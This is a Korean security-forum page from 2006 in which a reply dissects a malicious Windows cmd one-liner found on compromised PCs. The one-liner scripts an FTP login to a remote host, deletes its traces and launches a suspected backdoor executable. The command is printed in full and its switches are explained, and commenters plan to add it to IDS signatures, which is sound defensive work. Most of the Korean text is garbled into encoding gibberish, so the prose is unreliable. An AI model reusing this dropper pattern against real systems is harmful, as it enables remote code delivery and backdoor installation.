Å©·¡Å· ÇÇÇØ

 423, 10/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   pr0sp3r
   http://lastlog.com
   [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=226 [º¹»ç]


ÇØ´ç ÄÚµå´Â

cmd /k
echo open x.x.136.76 23825 > o &
echo user 1 1              >> o &
echo quit                  >> o &
ftp -n -s:o &
del /F /Q o &
axdcfasb.exe

À§¿Í °°Àº ÇüÅ·ΠÀÌ·ç¾î Áö¸ç

> ¸®´ÙÀÌ·ºÆ®(Ç¥ÁØÃâ·Â),
>> ¸®´ÙÀÌ·ºÆ®(Ç¥ÁØÃâ·Â Ãß°¡)
& ¹®ÀÚ¿­ Á¢¼ÓÀÚ


cmd.exeÀÇ ÆĶó¸ÞÅ͸¦ ÅëÇÑ ÀǵµÇÑ ÀÛ¾÷À» batch ÆÄÀÏ·Î ftp ÁÖ¼Ò¿Í
À¯Àú¸í/Æнº¿öµå ¸íÀ» ÆÄÀÏ·Î ÀúÀå½ÃŲ ÈÄ
¸¸µé¾îÁø o ÆÄÀÏÀÇ Á¤º¸¸¦ ÀÌ¿ëÇÏ¿© ftp Á¢¼ÓÇÏ°í,
¸¸µé¾îÁø ÆÄÀÏÀ» Áö¿îµÚ
axdcfasb.exe( ¾Æ¸¶µµ ¹éµµ¾î·Î ÀǽɵÊ) ¸¦ ½ÇÇàÇϵµ·Ï µÇ¾îÀֳ׿ä.


À¯»çÇÏ°Ô ÆÄÀÏÀ» ¸¸µé¸é..
-------------------------------------------------------------------------------
C:\DOCUME~1\ADMINI~1>cmd /k echo open 1.1.1.1>test.txt&echo user 1 1>>test.txt&
echo quit>>test.txt

exit

C:\DOCUME~1\ADMINI~1>type test.txt
open 1.1.1.1

C:\DOCUME~1\ADMINI~1>C:\DOCUME~1\ADMINI~1>user 1
quit
--------------------------------------------------------------------------------

À§¿¡¼­ »ç¿ëµÈ ÇÁ·Î±×·¥ÀÇ ÆĶó¸ÞÅÍ ¼³¸íÀÔ´Ï´Ù.

Windows2000 ¸í·É ÀÎÅÍÇÁ¸®ÅÍÀÇ »õ ÀνºÅϽº¸¦ ½ÃÀÛÇÕ´Ï´Ù.
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
    [[/S] [/C | /K] ¹®ÀÚ¿­]

/K      ¹®ÀÚ¿­ÀÌ ÁöÁ¤ÇÑ ¸í·É¾î¸¦ ¼öÇàÇÑ ÈÄ¿¡ °è¼Ó ³²¾ÆÀÖ½À´Ï´Ù.
===============================================================================

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
-n             Suppresses auto-login upon initial connection.
-s:filename    Specifies a text file containing FTP commands; the
               commands will automatically run after FTP starts.
===============================================================================
DEL [/P] [/F] [/S] [/Q] [/A[[:]Ư¼º]] À̸§
/F            Àбâ Àü¿ë ÆÄÀÏÀ» °­Á¦·Î »èÁ¦ÇÕ´Ï´Ù.
/Q            Á¶¿ëÇÑ ¸ðµå, ±Û·Î¹ú ¿ÍÀϵå Ä«µå¿¡¼­ »èÁ¦Çصµ ¹¯Áö ¾Ê½À´Ï´Ù.
===============================================================================

>´Ù¼öÀÇ ½ºÆÔ¸±·¹ÀÌ È¤Àº ½ºÄ³´× Åø¿¡ µ¿ÀÛÇÏ´Â ÄÄÇ»Å͵鿡
>proceexpolore ·Î È®ÀÎÇغ» °á°ú ¾Æ·¡¿Í °°Àº µ¿ÀÛÀÌ ¼öÇàÁßÀÓÀ» ¾Ë ¼ö ÀÖ¾ú½À´Ï´Ù.
>
>Áß°£¿¡ »ðÀÔµÈ o&´Â ¾î¶² ¿ªÈ°À» ÇÏ´ÂÁö.. ¾Æ·¡ Äڵ忡 ´ëÇÑ »ó¼¼ÇÑ ºÐ¼®À» µµ¿ÍÁֽñ⠹ٶø´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
>
>cmd /k echo open x.x.136.76 23825 > o&echo user 1 1 >> o &echo quti >> o &ftp -n -s:o &del /F /Q o &axdcfasb.exe
>
>¸Å¹ø °í¸¿½À´Ï´Ù...
===============================================================================


  Hit : 3807     Date : 2006/07/07 02:38



    
soarrr ´äº¯ °¨»çµå¸³´Ï´Ù.. ÇØ´ç ÆÐÅÏÀ» IDS ¿¡ µî·ÏÇØ ³ö¾ß°Ú±º¿ä.. 2006/07/10  
ChuRack ¿À... ¸ÚÁ®¿ä... 2006/07/17  
243   ¿©¸§¹æÇп¡...itÄ·ÇÁ°°Àº°Å ÀÖ¾î¿ä..?[3]     momma1004
05/31 3750
242   ¹Ù¶÷Àdzª¶ó ´ëÇ¥ÀÛ....[10]     dlgmltjs2001
12/11 3754
241   Àú ÀÌ»óÇÑ°Ô °è¼Ó ±ò¸³´Ï´Ù ¤Ñ,.¤Ñ[11]     qkreoghks00
01/23 3758
240   Á¦ ÄÄÅÍ°¡ ÇØÅ· ´çÇߴµ¥ µµ¿ÍÁÖ¼¼¿ä...¤Ð¤Ð[5]     cybergap
07/03 3762
239   ´©±º°¡ Á¦ ÄÄ¿¡ ´Ù³à °¡´Â°Å °°½À´Ï´Ù. µµ¿Í ÁÖ¼¼¿ä[9]     tomokjjang
08/02 3763
238   ·çÆ® ±Çȯ ʼnµæ Áú¹®..[3]     ykm930
08/30 3767
237   À½... svchost Áú¹®..[4]     -ÄÚ³­
11/07 3769
236     [re] ÇØÄ¿¿Í Å©·¡Ä¿     ori0433
11/19 3771
235   sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..[4]     youngman0707
11/10 3771
234   v.wom.conficker °¨¿°[1]     wlals813
06/02 3773
233   ÄÄÇ»ÅÍ¿¡¼­ ÀڷḦ »©°¬¾ú´ÂÁö È®Àΰ¡´ÉÇϳª¿ä?[3]     ÀÀÅ­Çѳʱ¸¸®
09/28 3779
232   À©µµ¿ì xp ºÎÆÃÈÄ ·Î±×ÀÎÇÑ´ÙÀ½ Æ®¶óºíÀÌ»ý±è´Ï´Ù..[5]     james89kim
08/31 3780
231   ¾È³çÇϼ¼¿ä..°¡ÀÔÇÏÀÚ ¸¶ÀÚ µµ¿òÀ» ûÇÏ°Ô µÇ³×¿ä..¤Ì¤Ì[2]     oneman73
05/12 3792
230   ¡Ú½ºÅäÄ¿ÇØÅ·¿¡ ´ëÇÑ Áú¹®ÀÔ´Ï´Ù °í¼ö´Ôµé ´äº¯ºÎŹµå¸³´Ï´Ù[5]     thouss
08/28 3794
229   µµ½º°ø°Ý ´çÇÑ°Í °°Àºµ¥..[6]     ´ÙÅ©·¹ÀÎÁ®
12/26 3798
228   ÇØÅ· óÀ½ ¹è¿öº¾´Ï´Ù. ¾îÄÉÇؾßÇÏÁÒ?[2]     kjw1oo
03/04 3804
227   °ÔÀÓ³»¿¡¼­ ¾Ë¸²Ã¢ ¾È¶ß°Ô µµ¿ÍÁÖ¼¼¿ä..[3]     com4edit
12/17 3805
    [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..[2]     pr0sp3r
07/07 3806
225   Áú¹®ÀÔ´Ï´Ù..À߾ƽôºР´äÁ»..[4]     ÇØÄ¿´ÞŸ³É
11/21 3807
224   rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..     soarrr
07/04 3807
[1][2][3][4][5][6][7][8][9] 10 ..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org